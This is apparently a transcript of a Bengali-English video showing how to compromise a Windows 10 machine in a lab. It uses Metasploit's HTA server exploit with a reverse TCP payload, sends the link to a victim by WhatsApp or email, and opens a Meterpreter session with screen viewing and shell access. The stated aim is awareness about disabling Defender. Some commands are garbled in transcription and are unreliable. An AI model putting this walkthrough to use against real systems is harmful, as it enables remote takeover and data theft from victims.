হাই ফ্রেন্ড, আমি রোহিত। অ্যান্ড আগের দিন আমি একটা পিকচার আপলোড করেছিলাম আমার ফেসবুক স্টোরিতে। তো উইন্ডোজ 10 কী করে হ্যাক হয় সেটা দেখাবো। সো উইন্ডোজ 10 ইউজার যারা আছো তাদের জন্য খুবই ইম্পর্টেন্ট একটা ভিডিও এটা। তো সবাই বেসিক্যালি উইন্ডোজের মধ্যে আমরা যারা মানে যারা গেম খেলো বা বিভিন্ন ফ্রি সফটওয়্যার ইউজ করো, তো অনেক সময় কী হয়, আমরা ফ্রি সফটওয়্যার বা গেমের যে ক্র্যাক ফাইল ইউজ করার জন্য আমরা কী করি, ডিফেন্ডারটাকে অফ করি বা যে অ্যান্টিভাইরাস থাকে সেই অ্যান্টিভাইরাসগুলোকে আমরা অফ করি। দেন সেই জিনিসগুলোকে আমরা রান করি। বাট যদি ডিফেন্ডার অফ থাকে তো সেই জিনিসটা রান হয় না, তার জন্য ডিফেন্ডারটা অফ করে তারপরে সেই জিনিসগুলোকে রান করি। বাট যে অ্যাপগুলো আমরা উইদাউট ডিফেন্ডার রান করি, মানে ডিফেন্ডার অন ছাড়াই আমরা রান করি, সো এই যে অ্যাপগুলো ডিফেন্ডার ছাড়া রান করছি, তো তার ফলে কি হচ্ছে সেটা আমরা দেখতে পাচ্ছি না। বাট আমরা মনে করছি যে আমরা ফ্রিতে সেই জিনিসগুলো পেয়ে যাচ্ছি। তো দেখে নেওয়া যাক যে এই ফ্রি জিনিসগুলো কি হতে পারে, বা হ্যাকাররা চাইলে এই জিনিসগুলো দিয়ে কীভাবে অ্যাক্সেস করতে পারে আমাদের কম্পিউটার। সো আমার এখানে ভিএমআর রয়েছে, দেন একটা উইন্ডোজ 10 রয়েছে দেখতে পাচ্ছি, অ্যান্ড কালি লিনাক্স। সো তো ফার্স্টে যেটা করব সেটা টার্মিনাল। This is my IP. Copy, then open new terminal. MS console. Okay, now search HA server. Okay, then use HT server. Okay, then set field host. তো এখানে যে আইপিটা আমরা পেস্ট করবো সেটা হলো আমাদের নিজস্ব মেশিনের আইপি। সো এটা স্ট্যাটিকলি কাজ করছি, তো আমি এখানে নিজস্ব মেশিনের আইপি দিচ্ছি। বাট যদি আমি আমার মেশিন থেকে অন্য কোনো রাউটার বা অন্য কোনো মেশিন বা অল ওভার ওয়ার্ল্ডে যদি কারোর সাথে কানেক্ট হতে চাই, তো সেখানে ডাইনামিক আইপিগুলো আমরা ইউজ করে থাকি। 168.220.130 ও চেক করে নিই আমাদের আইপি যেটা ছিল কনফিগারে রেখেছিলাম। তো 192.168.220.130। ওকে, তো দেন set srv host, then same IP 192.168.220.130. Okay, then set srv port equal 5555. Then set payload Windows
এটা রিভার্স টিসিপি, দেন এক্সপ্লয়েট। ওকে, সো আমি এখানে কি করলাম, জাস্ট আমার আইপিটা দেখলাম, দেন আমি এখানে একটা এক্সপ্লয়েট ওপেন করলাম এমএস কনসোলের ভিতরে, দেন এল হোস্ট, এল পোর্ট, এসআরভি হোস্ট, এসআরভি পোর্ট, দেন পেলোড সেট করলাম, দেন যখন এক্সপ্লয়েট করলাম একটা লিঙ্ক আমাদের দিয়ে দিল যেটা ইউজিং ইউআরএল। সো এই যে লিঙ্কটা আছে, এই লিঙ্কটা আমরা বাই হোয়াটসঅ্যাপ, বাই মেল, যে কোনোভাবে আমরা ভিকটিমকে সেন্ড করতে পারি, অথবা আমাদের কোনো ওয়েবসাইট যেখানে আমরা এই ইউআরএলটাকে পেস্ট করতে পারি, বা এই ইউআরএল দিয়ে কোনো ম্যালেসিয়াস অ্যাপ বা যে কোনো কিছু আমরা সেট করতে পারি, যেটা মানে ভিকটিম ডাউনলোড করবে, দেন সেটাকে যখন ইনস্টল করবে সেই ভিকটিমের অ্যাক্সেসটা আমরা পেয়ে যাবো। সো যেহেতু আমরা ভিএমওয়ার ইউজ করছি, তো কপি সিলেকশন, জাস্ট এটাকে আমরা কপি করব, দেন উইন্ডোজ 10 ওপেন এনি ব্রাউজার। তো এখানে মাইক্রোসফট এজ রয়েছে, এটা গুগল ক্রোম হতে পারে, ফায়ারফক্স হতে পারে, যে কোনো ব্রাউজার থেকে আমরা ওপেন করতে পারি। তো যে লিঙ্কটা কপি করেছিলাম, সরি, সেটা এখানে পেস্ট করবো, কন্ট্রোল পি, দেন এন্টার। ওকে, সো এখানে একটা অ্যাপ ডাউনলোড হতে আছে, তো কি নাও, তো যেটা হয়ে থাকে, আমরা যে কোনো ফ্রি সফটওয়্যার, মানে পেড সফটওয়্যারগুলো ফ্রিতে ইউজ করার জন্য আমরা ডিফেন্ডারটাকে অনেক সময় অফ করে দিই। তো সেরকমই, তো এটা সাপোজ এটা বেসিক্যালি টেস্টিংয়ের জন্য ইউজ করছি, তো এটা হতে পারে কোনো পেটিএম লিঙ্ক অর যে কোনো অ্যাপ যেটা তোমার কাজে দরকার বা তোমাদের কাজে দরকার। তো যদি সেই অ্যাপটা ইউজ করতে চাই, তো আমি এখানে পারমিশনগুলো অফ করলাম, দেন ডাউন হয়নি, open file, then run. Now get started, enter exploit, background job 1. ওকে, তো তো কি বেসিক্যালি কি হলো, জাস্ট এখানে লিঙ্কটা আমি ভিকটিমকে সেন্ড করলাম, ভিকটিম সেটা যে কোনো ব্রাউজারে ওপেন করলো, ওপেন করার পরে সে অ্যাপটাকে সে ডাউনলোড করে জাস্ট রান করলো। তো এটা ভেবে নাও তোমরা কোনো গেম
খেলতে চাইছো বা যে কোনো সফটওয়্যার ফ্রিভাবে ইউজ করতে চাইছো, তো কি হচ্ছে সেখানে আমরা এরকম প্রচুর অ্যাপ ডাউনলোড করি যে যাতে আমরা ফ্রিতে ইউজ করতে পারি। তো যখনই ফ্রিতে ইউজ করি তখন কী হয়, পারমিশনগুলোকে আমাদেরকে অফ করতে হয়, কারণ ফ্রি অ্যাপগুলো কী হয় বেসিক্যালি উইন্ডোজ ডিফেন্ডার বা যে কোনো অ্যান্টিভাইরাস ওটাকে ভাইরাস হিসেবে ডিটেক্ট করে। বাট আমরা ফ্রির জন্য সেইগুলোকে মানে ভাইরাস প্রোটেকশনগুলোকে অফ করে দিই, অফ করে দেওয়ার পরে ফ্রির জন্য সেগুলোকে ইউজ করি। তো এই ফ্রির জন্য যখনই আমরা ইউজ করি তো আমরা তো এই অ্যাপটাকে ইনস্টল করে নিই, যেরকম আমি ইনস্টল করলাম। তো যখনই ইনস্টল করি সেই অ্যাপটা যে ক্রিয়েট করেছে বা অ্যাপটার ভেতরে যদি কোনো কিছু বাইন্ড করা থাকে বা যে বাইন্ড করেছে তার কাছে এরকম মেটারপেটার সেশন একটা চলে আসবে। তো এই সেশন দিয়ে আমরা কি করতে পারি, সেশনস দেন এখানে দেখতে পাচ্ছি ID1, তো সেশনস 1 এন্টার, মেটারপেটা চলে এসছে। দেন sys info, ওকে, সো উইন্ডোজ 10। দেন আমি যদি তার গ্রাফিক্যাল ইন্টারফেস মানে সেই ভিকটিম কি করছে তার উইন্ডোজ স্ক্রিনটা দেখতে চাই, সেটাও আমি দেখতে পারি। মেটারপেটার অফ হয়ে গেছে। Meter run minus run PLC. তো দেখতে পাচ্ছি এখানে ভিক্টিমের স্ক্রিনটা চলে আসছে। তো
ভিকটিম কী করছে সেটাও আমি দেখতে পাবো। ইভেন জাস্ট shell ওপেন সি ইউজার, দেন তার কমান্ড পয়েন্টের অ্যাক্সেসটাও আমি পেয়ে যাচ্ছি। সো dir ডিরেক্টরি টোটাল ফাইল। সো বেসিক্যালি কী হচ্ছে যে আমরা ফ্রি এর জন্য আমাদের ডিফেন্ডারটাকে অফ করে দিচ্ছি, দেন সেই অ্যাপটাকে আমরা ইনস্টল করছি। বাট অ্যাপটা ইনস্টল হওয়ার পরে কী হচ্ছে, আমরা আমাদের কাজগুলো করছি, বাট ওই অ্যাপটা দিয়ে যে হ্যাকার রয়েছে বা যে অ্যাপটা ক্রিয়েট করেছে সে টোটাল অ্যাক্সেসটাই পেয়ে যাচ্ছে। মানে সে চাইলে তোমার কম্পিউটারকে অ্যাক্সেস করার পরে তোমার কম্পিউটার থেকে যে কোনো ফাইল নিয়ে নিতে পারে, তার ফাইল সেখানে আপলোডও করে দিতে পারে। সো যখনই কোনো ফ্রি অ্যাপ ইউজ করবে, অলওয়েজ ইউজ অ্যান্টিভাইরাস অর উইন্ডোজ ডিফেন্ডার অন। যদি অন না করো তো এই টাইপের অ্যাটাকগুলো হয়ে থাকতে পারে। ইভেন সে চাইলে পরে তোমার কম্পিউটারে ডিডস অ্যাটাক করতে পারে, দেন পুরো কম্পিউটারটাকেই নষ্ট করে দিতে। তো যদি ভিডিওটা ভালো লেগে থাকে তো অবশ্যই আমাদের চ্যানেলটাকে সাবস্ক্রাইব করে দিও। অ্যান্ড এরকম ইনফরমেশন বা সাইবার সিকিউরিটি, কোডিং এই টাইপের ভিডিও আমরা আরও আপলোড করব, আরও নতুন কিছু নিয়ে। তো দ্যাটস ইট।